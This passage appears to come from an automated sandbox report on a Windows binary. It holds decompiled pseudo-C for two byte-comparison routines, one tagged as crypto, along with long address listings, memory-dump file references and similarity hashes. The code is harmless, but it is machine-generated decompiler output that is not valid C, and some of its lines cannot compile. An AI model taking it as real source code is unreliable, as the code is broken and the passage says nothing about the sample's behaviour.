								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                                                                                                                0x00ed6352
                                                                                                                0x00ed6352
                                                                                                                0x00ed6358
                                                                                                                0x00ed63e0
                                                                                                                0x00ed63e2
                                                                                                                0x00ed63e4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed63ea
                                                                                                                0x00ed63f0
                                                                                                                0x00ed6477
                                                                                                                0x00ed6479
                                                                                                                0x00ed647b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6481
                                                                                                                0x00ed6487
                                                                                                                0x00ed650e
                                                                                                                0x00ed6510
                                                                                                                0x00ed6512
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6518
                                                                                                                0x00ed651e
                                                                                                                0x00ed65a5
                                                                                                                0x00ed65a7
                                                                                                                0x00ed65a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed65b5
                                                                                                                0x00ed663d
                                                                                                                0x00ed663f
                                                                                                                0x00ed6641
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6647
                                                                                                                0x00ed664d
                                                                                                                0x00ed66d4
                                                                                                                0x00ed66d6
                                                                                                                0x00ed66d8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed66de
                                                                                                                0x00ed66e4
                                                                                                                0x00ed676b
                                                                                                                0x00ed676d
                                                                                                                0x00ed676f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed677d
                                                                                                                0x00ed677f
                                                                                                                0x00ed6797
                                                                                                                0x00ed679f
                                                                                                                0x00ed67a1
                                                                                                                0x00ed5efa
                                                                                                                0x00ed5f02
                                                                                                                0x00ed5f04
                                                                                                                0x00ed5f11
                                                                                                                0x00ed5f11
                                                                                                                0x00000000
                                                                                                                0x00ed5f04
                                                                                                                0x00ed67ae
                                                                                                                0x00ed5ef4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5ef4
                                                                                                                0x00ed6788
                                                                                                                0x00ed6791
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6791
                                                                                                                0x00ed66f1
                                                                                                                0x00ed66f3
                                                                                                                0x00ed670b
                                                                                                                0x00ed6713
                                                                                                                0x00ed6715
                                                                                                                0x00ed672d
                                                                                                                0x00ed6735
                                                                                                                0x00ed6737
                                                                                                                0x00ed674f
                                                                                                                0x00ed6757
                                                                                                                0x00ed6759
                                                                                                                0x00ed6762
                                                                                                                0x00ed6762
                                                                                                                0x00000000
                                                                                                                0x00ed6759
                                                                                                                0x00ed6740
                                                                                                                0x00ed6749
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6749
                                                                                                                0x00ed671e
                                                                                                                0x00ed6727
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6727
                                                                                                                0x00ed66fc
                                                                                                                0x00ed6705
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6705
                                                                                                                0x00ed665a
                                                                                                                0x00ed665c
                                                                                                                0x00ed6674
                                                                                                                0x00ed667c
                                                                                                                0x00ed667e
                                                                                                                0x00ed6696
                                                                                                                0x00ed669e
                                                                                                                0x00ed66a0
                                                                                                                0x00ed66b8
                                                                                                                0x00ed66c0
                                                                                                                0x00ed66c2
                                                                                                                0x00ed66cb
                                                                                                                0x00ed66cb
                                                                                                                0x00000000
                                                                                                                0x00ed66c2
                                                                                                                0x00ed66a9
                                                                                                                0x00ed66b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed66b2
                                                                                                                0x00ed6687
                                                                                                                0x00ed6690
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6690
                                                                                                                0x00ed6665
                                                                                                                0x00ed666e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed666e
                                                                                                                0x00ed65c3
                                                                                                                0x00ed65c5
                                                                                                                0x00ed65dd
                                                                                                                0x00ed65e5
                                                                                                                0x00ed65e7
                                                                                                                0x00ed65ff
                                                                                                                0x00ed6607
                                                                                                                0x00ed6609
                                                                                                                0x00ed6621
                                                                                                                0x00ed6629
                                                                                                                0x00ed662b
                                                                                                                0x00ed6634
                                                                                                                0x00ed6634
                                                                                                                0x00000000
                                                                                                                0x00ed662b
                                                                                                                0x00ed6612
                                                                                                                0x00ed661b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed661b
                                                                                                                0x00ed65f0
                                                                                                                0x00ed65f9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed65f9
                                                                                                                0x00ed65ce
                                                                                                                0x00ed65d7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed65d7
                                                                                                                0x00ed652b
                                                                                                                0x00ed652d
                                                                                                                0x00ed6545
                                                                                                                0x00ed654d
                                                                                                                0x00ed654f
                                                                                                                0x00ed6567
                                                                                                                0x00ed656f
                                                                                                                0x00ed6571
                                                                                                                0x00ed6589
                                                                                                                0x00ed6591
                                                                                                                0x00ed6593
                                                                                                                0x00ed659c
                                                                                                                0x00ed659c
                                                                                                                0x00000000
                                                                                                                0x00ed6593
                                                                                                                0x00ed657a
                                                                                                                0x00ed6583
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6583
                                                                                                                0x00ed6558
                                                                                                                0x00ed6561
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6561
                                                                                                                0x00ed6536
                                                                                                                0x00ed653f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed653f
                                                                                                                0x00ed6494
                                                                                                                0x00ed6496
                                                                                                                0x00ed64ae
                                                                                                                0x00ed64b6
                                                                                                                0x00ed64b8
                                                                                                                0x00ed64d0
                                                                                                                0x00ed64d8
                                                                                                                0x00ed64da
                                                                                                                0x00ed64f2
                                                                                                                0x00ed64fa
                                                                                                                0x00ed64fc
                                                                                                                0x00ed6505
                                                                                                                0x00ed6505
                                                                                                                0x00000000
                                                                                                                0x00ed64fc
                                                                                                                0x00ed64e3
                                                                                                                0x00ed64ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed64ec
                                                                                                                0x00ed64c1
                                                                                                                0x00ed64ca
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed64ca
                                                                                                                0x00ed649f
                                                                                                                0x00ed64a8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed64a8
                                                                                                                0x00ed63fd
                                                                                                                0x00ed63ff
                                                                                                                0x00ed6417
                                                                                                                0x00ed641f
                                                                                                                0x00ed6421
                                                                                                                0x00ed6439
                                                                                                                0x00ed6441
                                                                                                                0x00ed6443
                                                                                                                0x00ed645b
                                                                                                                0x00ed6463
                                                                                                                0x00ed6465
                                                                                                                0x00ed646e
                                                                                                                0x00ed646e
                                                                                                                0x00000000
                                                                                                                0x00ed6465
                                                                                                                0x00ed644c
                                                                                                                0x00ed6455
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6455
                                                                                                                0x00ed642a
                                                                                                                0x00ed6433
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6433
                                                                                                                0x00ed6408
                                                                                                                0x00ed6411
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed635e
                                                                                                                0x00ed6362
                                                                                                                0x00ed6366
                                                                                                                0x00ed6368
                                                                                                                0x00ed6380
                                                                                                                0x00ed6380
                                                                                                                0x00ed6388
                                                                                                                0x00ed638a
                                                                                                                0x00ed63a2
                                                                                                                0x00ed63a2
                                                                                                                0x00ed63aa
                                                                                                                0x00ed63ac
                                                                                                                0x00ed63c4
                                                                                                                0x00ed63c4
                                                                                                                0x00ed63cc
                                                                                                                0x00ed63ce
                                                                                                                0x00ed63d7
                                                                                                                0x00ed63d7
                                                                                                                0x00000000
                                                                                                                0x00ed63ce
                                                                                                                0x00ed63b2
                                                                                                                0x00ed63b5
                                                                                                                0x00ed63be
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed63be
                                                                                                                0x00ed6390
                                                                                                                0x00ed6393
                                                                                                                0x00ed639c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed639c
                                                                                                                0x00ed636e
                                                                                                                0x00ed6371
                                                                                                                0x00ed637a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed637a
                                                                                                                0x00ed5ae0
                                                                                                                0x00ed5ae0
                                                                                                                0x00ed68d1

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                • Instruction ID: 7d32fc7aebe9281045757a7f18fc1d81f18e07847de8bb809b681e67f7d7ef15
                                                                                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                • Instruction Fuzzy Hash: 6AC1A7332055B30ADF2D4639C47403FBAA1EAA27B631A276FD4B3DB2D5EE10C565D520
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED5AE8, Relevance: .3, Instructions: 331COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ED5AE8(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                                                                                                                0x00ed5ae8
                                                                                                                0x00ed5ae8
                                                                                                                0x00ed5aee
                                                                                                                0x00ed5b65
                                                                                                                0x00ed5b67
                                                                                                                0x00ed5b69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5b6f
                                                                                                                0x00ed5b75
                                                                                                                0x00ed5bfc
                                                                                                                0x00ed5bfe
                                                                                                                0x00ed5c00
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5c06
                                                                                                                0x00ed5c0c
                                                                                                                0x00ed5c93
                                                                                                                0x00ed5c95
                                                                                                                0x00ed5c97
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5c9d
                                                                                                                0x00ed5ca3
                                                                                                                0x00ed5d2a
                                                                                                                0x00ed5d2c
                                                                                                                0x00ed5d2e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5d34
                                                                                                                0x00ed5d3a
                                                                                                                0x00ed5dc1
                                                                                                                0x00ed5dc3
                                                                                                                0x00ed5dc5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5dd1
                                                                                                                0x00ed5e59
                                                                                                                0x00ed5e5b
                                                                                                                0x00ed5e5d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5e63
                                                                                                                0x00ed5e69
                                                                                                                0x00ed5ef0
                                                                                                                0x00ed5ef2
                                                                                                                0x00ed5ef4
                                                                                                                0x00ed5f02
                                                                                                                0x00ed5f04
                                                                                                                0x00ed5f11
                                                                                                                0x00ed5f11
                                                                                                                0x00ed5f04
                                                                                                                0x00000000
                                                                                                                0x00ed5ef4
                                                                                                                0x00ed5e76
                                                                                                                0x00ed5e78
                                                                                                                0x00ed5e90
                                                                                                                0x00ed5e98
                                                                                                                0x00ed5e9a
                                                                                                                0x00ed5eb2
                                                                                                                0x00ed5eba
                                                                                                                0x00ed5ebc
                                                                                                                0x00ed5ed4
                                                                                                                0x00ed5edc
                                                                                                                0x00ed5ede
                                                                                                                0x00ed5ee7
                                                                                                                0x00ed5ee7
                                                                                                                0x00000000
                                                                                                                0x00ed5ede
                                                                                                                0x00ed5ec5
                                                                                                                0x00ed5ece
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5ece
                                                                                                                0x00ed5ea3
                                                                                                                0x00ed5eac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5eac
                                                                                                                0x00ed5e81
                                                                                                                0x00ed5e8a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5e8a
                                                                                                                0x00ed5ddf
                                                                                                                0x00ed5de1
                                                                                                                0x00ed5df9
                                                                                                                0x00ed5e01
                                                                                                                0x00ed5e03
                                                                                                                0x00ed5e1b
                                                                                                                0x00ed5e23
                                                                                                                0x00ed5e25
                                                                                                                0x00ed5e3d
                                                                                                                0x00ed5e45
                                                                                                                0x00ed5e47
                                                                                                                0x00ed5e50
                                                                                                                0x00ed5e50
                                                                                                                0x00000000
                                                                                                                0x00ed5e47
                                                                                                                0x00ed5e2e
                                                                                                                0x00ed5e37
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5e37
                                                                                                                0x00ed5e0c
                                                                                                                0x00ed5e15
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5e15
                                                                                                                0x00ed5dea
                                                                                                                0x00ed5df3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5df3
                                                                                                                0x00ed5d47
                                                                                                                0x00ed5d49
                                                                                                                0x00ed5d61
                                                                                                                0x00ed5d69
                                                                                                                0x00ed5d6b
                                                                                                                0x00ed5d83
                                                                                                                0x00ed5d8b
                                                                                                                0x00ed5d8d
                                                                                                                0x00ed5da5
                                                                                                                0x00ed5dad
                                                                                                                0x00ed5daf
                                                                                                                0x00ed5db8
                                                                                                                0x00ed5db8
                                                                                                                0x00000000
                                                                                                                0x00ed5daf
                                                                                                                0x00ed5d96
                                                                                                                0x00ed5d9f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5d9f
                                                                                                                0x00ed5d74
                                                                                                                0x00ed5d7d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5d7d
                                                                                                                0x00ed5d52
                                                                                                                0x00ed5d5b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5d5b
                                                                                                                0x00ed5cb0
                                                                                                                0x00ed5cb2
                                                                                                                0x00ed5cca
                                                                                                                0x00ed5cd2
                                                                                                                0x00ed5cd4
                                                                                                                0x00ed5cec
                                                                                                                0x00ed5cf4
                                                                                                                0x00ed5cf6
                                                                                                                0x00ed5d0e
                                                                                                                0x00ed5d16
                                                                                                                0x00ed5d18
                                                                                                                0x00ed5d21
                                                                                                                0x00ed5d21
                                                                                                                0x00000000
                                                                                                                0x00ed5d18
                                                                                                                0x00ed5cff
                                                                                                                0x00ed5d08
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5d08
                                                                                                                0x00ed5cdd
                                                                                                                0x00ed5ce6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5ce6
                                                                                                                0x00ed5cbb
                                                                                                                0x00ed5cc4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5cc4
                                                                                                                0x00ed5c19
                                                                                                                0x00ed5c1b
                                                                                                                0x00ed5c33
                                                                                                                0x00ed5c3b
                                                                                                                0x00ed5c3d
                                                                                                                0x00ed5c55
                                                                                                                0x00ed5c5d
                                                                                                                0x00ed5c5f
                                                                                                                0x00ed5c77
                                                                                                                0x00ed5c7f
                                                                                                                0x00ed5c81
                                                                                                                0x00ed5c8a
                                                                                                                0x00ed5c8a
                                                                                                                0x00000000
                                                                                                                0x00ed5c81
                                                                                                                0x00ed5c68
                                                                                                                0x00ed5c71
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5c71
                                                                                                                0x00ed5c46
                                                                                                                0x00ed5c4f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5c4f
                                                                                                                0x00ed5c24
                                                                                                                0x00ed5c2d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5c2d
                                                                                                                0x00ed5b82
                                                                                                                0x00ed5b84
                                                                                                                0x00ed5b9c
                                                                                                                0x00ed5ba4
                                                                                                                0x00ed5ba6
                                                                                                                0x00ed5bbe
                                                                                                                0x00ed5bc6
                                                                                                                0x00ed5bc8
                                                                                                                0x00ed5be0
                                                                                                                0x00ed5be8
                                                                                                                0x00ed5bea
                                                                                                                0x00ed5bf3
                                                                                                                0x00ed5bf3
                                                                                                                0x00000000
                                                                                                                0x00ed5bea
                                                                                                                0x00ed5bd1
                                                                                                                0x00ed5bda
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5bda
                                                                                                                0x00ed5baf
                                                                                                                0x00ed5bb8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5bb8
                                                                                                                0x00ed5b8d
                                                                                                                0x00ed5b96
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
